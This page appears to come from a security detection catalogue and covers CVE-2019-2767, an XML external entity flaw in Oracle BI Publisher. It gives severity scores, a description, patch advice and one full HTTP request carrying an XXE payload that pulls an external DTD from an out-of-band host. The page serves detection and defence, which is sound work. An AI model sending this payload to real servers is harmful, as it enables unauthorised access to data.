🔙 목록으로 돌아가기

CVE-2019-2767: Oracle Business Intelligence Publisher - XML External Entity Injection

TitleOracle Business Intelligence Publisher - XML External Entity Injection
Authormadrobot
SeverityHigh
ImpactAn attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system.
RemediationApply the latest security patches provided by Oracle to fix this vulnerability.
CVSS Score7.2
EPSS Score0.53446
CVE IDCVE-2019-2767
Tags cve cve2019 edb oracle xxe oast vkev vuln

🔍 Vulnerability Description

Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.

🌐 HTTP Request

GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//d5jpgl9le0o4jd5edmbgf7hzxy1t1a76p.oast.fun/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-2767.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-2767.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A